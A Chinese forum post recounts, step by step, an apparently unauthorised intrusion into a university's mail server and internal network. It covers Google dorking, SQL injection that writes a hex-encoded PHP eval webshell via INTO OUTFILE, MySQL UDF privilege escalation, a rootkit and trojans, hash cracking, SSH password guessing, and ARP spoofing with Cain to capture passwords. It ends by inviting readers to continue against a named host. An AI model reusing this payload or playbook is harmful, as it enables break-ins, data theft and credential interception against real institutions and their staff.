HanDs
管理员

[网络安全] 渗透XX大学邮件服务器 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

渗透XX大学邮件服务器


一、踩点


目标mail.xxx.edu.cn,做了CDN,真实IP暂时不知。linux的系统,开了22,直接搞估计是没戏的,只有慢慢从旁渗透了。


第一步,google,


site:xxx.edu.cn inurl:.asp?,


然后丢到管中窥豹里面扫了几下,发现几个注点,顺便进后台备份搞下一个SHELL。


二、提权未果,继续找入口(php注入)


SHELL权限限得很死,该禁用的都禁用了,尝试任何方法提权未果,决定放弃这条路。


继续google 


site:xxx.edu.cn inurl:.aspx? 


inurl:.php? inurl:.jsp?


等方法,结果在发现一个PHP的注点。


简单测试一下大小写为WINDOWS,加个单引号,发现居然GPC为OFF。这里让人信心大增,拿下这台服务器似乎不远了。


手工探测了下,7个字段,ROOT权限(这下他基本跑不掉了)


这下只要找到目标绝对路径SHELL就到手了,


开始想load_file WAMP的配置文件的,后来偷了个懒,利用咱们的google,


路径就出来了。


Warning www Site:xxx.edu.cn


最终经过一翻尝试,目标绝对路径为E:\www\job\


直接通过注点导出SHELL


And 1=2 union select 1,2, 0x3C3F70687020406576616C28245F504F53545B2762616F62616F275D293B3F3E,4,5,6,7 from mysql.user into outfile ‘e:\\www\\job\\1.php’--


然后上马,读MYSQL数据配置文件,拿ROOT密码。


由于目标是5.1,所以新建PLUGIN目录导UDF提权成功。


三、内网渗透


经过分析,job这台服务器的IP与目标mail的服务器IP相隔比较远,无法直接进行ARP等攻击。于是破解了本机三个管理员HASH。


并上传asprootkit.asp到www2.xxx.edu.cn的服务器,利用wexxx这个管理员登录,


提权成功,为了方便控制,种植上了木马。


在内网破解密码、渗透等一翻XXOO之后,终于找到一台可以从外网直接登入内网的服务器202.xxx.xxx.18,


并找到内网对应的MAIL服务器192.168.0.29


同时,还通过密码组合猜测的方式登录了另外一台MAIL的SSH


但目标的密码没有猜出来。


四、ARP未果,渗透员工数据库。


由于是内网IP,并不是公网IP,而且内网没有网关,所以ARP是没有用的,


必须还要找到与目标MAIL服务器使用同一个出口网关的服务器才可ARP。


于是决定暂时放弃这条路,想通过渗透目标员工数据库找到敏感信息。


通过前期收集的信息对,202.xxx.xxx.1-255进行扫描,发现一个202.xxx.xxx.72上有一个员工管理系统,


通过测试帐号登录后台,上传照片的地方利用字符截断获取WEBSHELL


进入数据库翻看了几十分钟,感觉太烦,没继续往下看。休息,等第二天再来。


五、直接ARP了

经过分析,认为从数据库中可能拿不到太有价值的东东,干脆直接ARP了吧,于是又一番XXOO,


终于搞到一台与目标MAIL使用同一出口的服务器,直接上CAIN,成功ARP,等RP看密码了。


如果娃娃想继续搞的话,可以多收集些信息,目标的SSH多半在某台管理员机子上面。


202.xxx.xxx.138 这台机子上存在密码的可能比较大,不过是台win7的个人机


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
渗透 X X 大学 邮件 服务器
#1楼
发帖时间:2016-9-20   |   查看数:0   |   回复数:0
游客组
快速回复